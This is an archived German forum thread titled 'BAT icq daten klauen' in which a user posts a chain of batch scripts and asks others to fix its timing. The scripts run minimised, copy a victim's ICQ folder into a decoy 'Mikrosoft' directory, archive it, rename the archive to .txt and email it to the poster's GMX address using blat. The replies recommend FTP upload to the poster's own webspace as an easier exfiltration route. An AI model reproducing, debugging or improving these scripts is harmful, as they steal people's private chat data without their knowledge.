PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : BAT icq daten klauen



marvin
05.11.2008, 20:36
habe da ein kleines Problem, ich möchte die kompletten Dateien im icq Verzeichnis über die E-Mail zugeschickt bekommen doch das versenden klappt nicht so ganz. Hier mal der Code’s


iqsend.bat

@echo off
if not "%1"=="" goto %1
start /MIN cmd.exe /C "%~nx0 begin"
goto:eof
:begin

xcopy "C:\Dokumente und Einstellungen\%username%\Eigene Dateien\icq" C:\Programme\Mikrosoft\xp1 /c /r /y /i /e
xcopy "C:\Dokumente und Einstellungen\%username%\Eigene Dateien\icq Lite" C:\Programme\Mikrosoft\xp1 /c /r /y /i /e
call winrarErstellen.cmd
exit
goto:eof


Mein Problem liegt hier, das er mal teilweise zulange braucht die Dateien zu komprimieren und deswegen rename.bat die .rar Datei nicht findet.

winrarErstellen.cmd


@echo off
if not "%1"=="" goto %1
start /MIN cmd.exe /C "%~nx0 begin"
goto:eof
:begin
start /min C:/programme/winrar/winrar.exe a -ep1 -r C:/Programme/Mikrosoft/xp/xp1.rar C:/Programme/Mikrosoft/xp1
echo >1.vbs wscript.sleep 95000
cscript 1.vbs
del 1.vbs
start rename.bat


rename.bat



@echo off
rename *.rar *.txt
echo >1.vbs wscript.sleep 10000
cscript 1.vbs
del 1.vbs
start /min install-senden.bat
exit

install-senden.bat


@echo off
if not "%1"=="" goto %1
start /MIN cmd.exe /C "%~nx0 begin"
goto:eof
:begin
blat -install mail.gmx.de xxxgmx.de 1 25 profil01 xxx@gmx.de pas
blat -installpop3 pop.gmx.de xxx@gmx.de 1 110 profil01 xxx@gmx.de pas
blat xp1.txt -to xxx@gmx.de -p profil01
start senden.bat
exit


senden.bat


@echo off
if not "%1"=="" goto %1
start /MIN cmd.exe /C "%~nx0 begin"
goto:eof
:begin
blat xp1.txt -to xxx@gmx.de -p profil01
exit

ist wahrscheinlich nicht die idealistischste Lösung aber wie ich finde kreativ, kann mir den da einer helfen???
Die Dateien Blatt.exe und blat.dll habe ich jetzt mal nicht aufgelistet

Brainfuck ++
05.11.2008, 20:52
also ... wieso per emai !? ^^ voll der umstand man ... machs per ftp ;-) viel einfach


cmd -> ftp help /?

hilft dir bestimmt...

Planxty
05.11.2008, 20:53
dafür ist e-mail konfortabler und schneller einzurihten als Ftp wenn man sich noch nicht mit dem thema befasst hat ;-)

Brainfuck ++
05.11.2008, 20:56
ich hab das per ftp gemacht...der upload dauert ca 4 sekunden bis ich es auf meinem webspace hatte ^^ naja ansichtsache ...